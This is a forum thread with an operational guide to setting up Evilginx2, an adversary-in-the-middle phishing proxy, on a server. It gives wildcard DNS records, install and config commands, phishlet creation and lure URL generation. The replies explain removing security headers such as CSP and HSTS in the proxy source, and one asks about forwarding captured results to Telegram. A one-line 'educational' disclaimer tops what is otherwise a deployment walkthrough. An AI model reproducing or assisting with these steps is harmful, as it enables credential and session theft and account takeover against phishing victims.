Setup Evilginx2 on Server / VPS

fluxxset · June 22, 2024, 6:21pm

Warning - This content is only for Educational purpuse

- Get DNS ready

remove all old records if there are any
add A name record for domain.com pointing to server IP
add A name record with value *.domain.com pointing to server ip

- Getting server ready

Sign in to the server

 ssh root@your-ip-here

update and install packahges

sudo apt update -y
sudo apt upgrade -y
sudo apt install curl git wget unzip golang -y

Setup evilginx2 from source

cd /root

git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2

or

wget https://github.com/kgretzky/evilginx2/releases/download/v3.3.0/evilginx-v3.3.0-linux-64bit.zip

unzip evilginx-v3.3.0-linux-64bit.zip

cd evilginx2

on ls you shold see folder with name phishlets
this is the location you put your phishlets

then start evilgenix for 1 st time

chmod +x evilginx2

./evilginx2

setup config

config domain domain.com
config external_ipv4 xx.xx.xx.xx
config dns_port 5300

check if your phishlets are loded with following cmmand

phishlets

now Type exit

now add your own phishlet

nano phishlets/test1.yaml

here is my exmple phishlet - make similar for you but dont use my domain fluxxset.com you can use your own

then save the file and exit ctrl + s then ctrl + x
Now start evilgenix again

./evilgenix2

now check if your phishlet is loded or not

NOw set hostname

phishlets hostname test1 example.com

then activate phishlet

phishlets enable test1

then create auth url

lures create test1

copy url

lures get-url 0

Done

If you still facing issue then you know where to find me

→

anon · July 19, 2024, 10:35am

Some websites got custom Haders , how can i remove them or Modify them ?

fluxxset · July 19, 2024, 11:39am

you can modify source of Evilginix for that .

fluxxset · July 19, 2024, 11:42am

check code here https://github.com/kgretzky/evilginx2/blob/master/core/http_proxy.go
Line - 903




			var rm_headers = []string{
				"Content-Security-Policy",
				"Content-Security-Policy-Report-Only",
				"Strict-Transport-Security",
				"X-XSS-Protection",
				"X-Content-Type-Options",
				"X-Frame-Options",
			}
			for _, hdr := range rm_headers {
				resp.Header.Del(hdr)
			}

			redirect_set := false

Add your haders in rm_headers list , and that should remove those

ralph231 · October 1, 2024, 12:50pm

How can i direct phishlets results to telegram?

fluxxset · October 1, 2024, 1:03pm

james_karani · November 8, 2024, 4:42pm

fluxxset · November 9, 2024, 7:27am

looks like you are getting it from source n this case it needs to be build

use

go build

and then

./evilginx2

also if you face any issue with gho version then do

sudo apt remove go*

and then follow this one

james_karani · November 9, 2024, 4:35pm

fluxxset · November 10, 2024, 6:58am

install go version using this

kl_paleis · February 26, 2025, 9:34pm

: config dns_port 5300
[21:32:47] [err] config: invalid syntax: [dns_port 5300]

fluxxset · February 27, 2025, 4:18am

Change directly in config file
Use

nano /root/.evilgenix/config.json

kl_paleis · February 28, 2025, 6:32pm

it worked, i was using a security group, so after setting everything up the prb has gone

Amax14 · March 7, 2025, 3:14am

I’m having this problem to and I change the port in the config file is there something else I can do to fix this problem

fluxxset · March 7, 2025, 6:47am

Yes user must be root

admin · March 9, 2025, 1:50pm

if user is not root then config file location will also change .